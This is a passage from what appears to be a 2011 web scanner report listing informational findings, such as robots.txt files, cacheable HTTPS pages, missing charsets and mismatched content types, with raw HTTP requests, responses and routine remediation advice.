Confidence:	Certain
Host:	http://www.retailcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retailcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:50 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:55:08 GMT
ETag: "1d1038b-1a83-483c77005c700"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.89. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rollingstone.com
Path:	/music/albumreviews/low-country-blues-20110114

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rollingstone.com

Response

HTTP/1.0 200 OK
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Cache-Control: private, max-age=400
Date: Sat, 22 Jan 2011 01:25:34 GMT
Content-Length: 79
Connection: close

User-agent: *
Disallow: /cms.php
Disallow: /preview.php
Disallow: /*?print=true

19.90. http://www.sciencescrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sciencescrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sciencescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:06 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:48:30 GMT
ETag: "1c483d4-1a83-483c7584cc780"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.91. http://www.scientistcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientistcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scientistcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:46 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:51:04 GMT
ETag: "1dc0109-1a83-483c7617aa200"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.92. http://www.sellingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sellingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sellingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:28 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:24:01 GMT
ETag: "2320d8d-1a82-4948c36b4e640"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6786
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 1000-1500
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /html
...[SNIP]...

19.93. http://www.sqlcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sqlcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sqlcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:17:40 GMT
ETag: "2608175-1bd8-476fb44347500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.94. http://www.teenagercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teenagercrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teenagercrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:57 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:54:17 GMT
ETag: "26b8102-1a83-483c76cfb9440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.95. http://www.telecomcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.telecomcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.telecomcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:59 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:48:14 GMT
ETag: "1c68213-1a83-483c75758a380"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.96. http://www.tradingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tradingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tradingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:48 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:40:18 GMT
ETag: "25b8431-1bf0-476fabe924080"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.97. http://www.trainingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trainingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trainingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:44 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:51:52 GMT
ETag: "21f11f5-1a83-483c764570e00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.98. http://www.transportationcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.transportationcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.transportationcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:24 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:48:46 GMT
ETag: "2218b1f-1a83-483c75940eb80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.99. http://www.travelingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:23 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:47:13 GMT
ETag: "1aa00f8-1a83-483c753b5da40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.100. http://www.truckingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truckingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truckingcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:41:00 GMT
ETag: "24e8105-1bf0-476fac1131f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.101. http://www.tvcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tvcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tvcrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:07 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:41:19 GMT
ETag: "22188f1-1bf0-476fac23509c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.102. http://www.underwritingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.underwritingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.underwritingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:52 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:41:39 GMT
ETag: "1cf82c1-1bf0-476fac36636c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.103. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/money/world/2011-01-20-chinabuilding20_ST_N.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Length: 1660
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "e3156eb5165ccb1:1f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 22 Jan 2011 01:23:58 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

19.104. http://www.veterinarycrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.veterinarycrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.veterinarycrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:48 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 15:19:56 GMT
ETag: "1d8010a-1a84-4948c281a7f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Visit-time: 0500-13:00
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /h
...[SNIP]...

19.105. http://www.volunteercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.volunteercrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.volunteercrossing.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:51:34 GMT
ETag: "2500135-1a83-483c763446580"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.106. http://www.workathomecrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.workathomecrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.workathomecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:40 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:18:42 GMT
ETag: "22182cb-1bd8-476fb47e68080"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.107. http://www.writingcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.writingcrossing.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.writingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:00 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 05:50:54 GMT
ETag: "5b8006-1bef-49780a30d2b80"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7151
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow:
...[SNIP]...

20. Cacheable HTTPS response previous next
There are 3 instances of this issue:

https://www.bmwusa.com/Secured/FrameCheck.aspx
https://www.lowermybills.com/lending/home-refinance/
https://www.toyotafinancial.com/consumer/tfs.portal

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

20.1. https://www.bmwusa.com/Secured/FrameCheck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/FrameCheck.aspx

Request

Response

20.2. https://www.lowermybills.com/lending/home-refinance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowermybills.com
Path:	/lending/home-refinance/

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.3. https://www.toyotafinancial.com/consumer/tfs.portal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toyotafinancial.com
Path:	/consumer/tfs.portal

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:54:44 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<title >Toyota Financial Services: Resource Center Home</
...[SNIP]...

21. HTML does not specify charset previous next
There are 7 instances of this issue:

https://www.lowermybills.com/lending/home-refinance/
http://www.softcomplex.com/products/tigra_calendar_pro/
http://www.toyota.co.jp/en/index.html
http://www.toyota.com/download-brochure.html
http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354
http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

21.1. https://www.lowermybills.com/lending/home-refinance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowermybills.com
Path:	/lending/home-refinance/

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.2. http://www.softcomplex.com/products/tigra_calendar_pro/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.softcomplex.com
Path:	/products/tigra_calendar_pro/

Request

GET /products/tigra_calendar_pro/ HTTP/1.1
Host: www.softcomplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17720
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<t
...[SNIP]...

21.3. http://www.toyota.co.jp/en/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.co.jp
Path:	/en/index.html

Request

GET /en/index.html HTTP/1.1
Host: www.toyota.co.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:30:10 GMT
Last-Modified: Wed, 15 Dec 2010 01:26:04 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 113
Connection: close
Age: 1381

<html><head><meta http-equiv="refresh" CONTENT="0; URL=http://www.toyota-global.com/"></head><body></body></html>

21.4. http://www.toyota.com/download-brochure.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toyota.com
Path:	/download-brochure.html

Request

GET /download-brochure.html HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62194

<!DOCTYPE html>
<html>
   <head>
       <meta content="charset=utf-8" />
       <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
       <meta name="Description" content="Download a Toyota brochure for
...[SNIP]...

21.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usatoday.com
Path:	/money/world/2011-01-20-chinabuilding20_ST_N.htm

Request

GET /money/world/2011-01-20-chinabuilding20_ST_N.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.6. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354 HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Fri, 21 Jan 2011 18:46:14 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.washingtonpost.com
Path:	/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

Request

GET /wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw HTTP/1.1
Host: www.washingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Web Server
Date: Fri, 21 Jan 2011 18:46:10 GMT
Content-type: text/html
Content-length: 4661
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Error - washingtonpost.com</title>

<script type="text/javascript">
<!--
//YOU CAN CHANGE THE NODE HERE
t
...[SNIP]...

22. Content type incorrectly stated previous next
There are 8 instances of this issue:

http://www.100kcrossing.com/favicon.ico
http://www.aharrisonbarnes.com/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php
http://www.aharrisonbarnes.com/wp-content/plugins/wordpress-thread-comment/wp-thread-comment.js.php
http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/images/career_mission.png
http://www.bcgsearch.com/favicon.ico
http://www.legalauthority.com/tmviewbanner.php
http://www.toyota.com/img/mobilepromo/mobileLogoBottom.gif
http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/myGuideParameters.js

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

22.1. http://www.100kcrossing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.100kcrossing.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.100kcrossing.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7556cua1kmjisgrmbs54t62tc7; flagimg=UnitedStates.gif; useripcountry=277; useripstate=3896; useripcity=2655979; usercountry=277; userstate=3896; usercity=2655979; regioninfo=2655979%7E32.7830556%7E-96.8066667; __utmz=1.1295654883.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=1.1903501068.1295654883.1295654883.1295654883.1; __utmc=1; __utmb=1.2.10.1295654883

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:07:32 GMT
Server: Apache
Last-Modified: Thu, 01 May 2008 06:56:09 GMT
ETag: "1aa0365-47e-44c25c296b440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 1150
Connection: Keep-alive
Via: 1.1 AN-0016020122545304

............ .h.......(....... ..... ..........................................................................................P...^0..[,..Z,..]/..U%..P...]/..\-..P...W'..\...Z,..[,..]/..N....t.......
...[SNIP]...

22.2. http://www.aharrisonbarnes.com/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.aharrisonbarnes.com
Path:	/wp-content/plugins/wishlist-member/js/ZeroClipboard.wlm.js.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

